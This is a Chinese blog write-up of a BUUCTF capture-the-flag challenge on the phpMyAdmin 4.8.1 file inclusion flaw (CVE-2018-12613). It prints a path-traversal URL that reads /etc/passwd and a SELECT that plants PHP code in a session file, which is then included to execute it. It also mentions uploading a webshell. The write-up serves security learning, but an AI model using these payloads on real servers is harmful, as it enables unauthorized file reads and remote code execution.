BUUCTF[PHPMYADMIN]CVE-2018-12613

本文详细介绍了phpMyAdmin 4.8.1版本存在的一个严重文件包含漏洞,该漏洞允许攻击者查看并可能执行服务器上的文件。通过特定的URL构造,可以实现远程文件包含,并成功执行phpinfo()。此外,还展示了如何利用此漏洞写入phpinfo文件,并通过包含session文件来进一步验证漏洞的存在。最终,作者通过分析phpinfo输出找到了隐藏的flag,揭示了漏洞利用的完整过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开所提供的网址

是个phpmyadmin界面

phpmyadmin的版本号为4.8.1

在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章

phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用

我们尝试一下任意文件包含

index.php?target=sql.php?/../../../../../../../../../etc/passwd

 执行成功

写入一个phpinfo文件

SELECT '<?php phpinfo()?>'

 

执行成功

查看我们的session,我们输入的这一段php代码其实已经保存在服务器中了。

 我们利用尝试包含session文件,出现phpinfo()。

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c4f4559797ee11b36826474f973af72b

 

往下翻看到flag

 

这里我一开始还是直接上传了一个小马,结果蚁剑上一直没找到flag文件,后面又翻了phpinfo的页面才查看到的flag

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值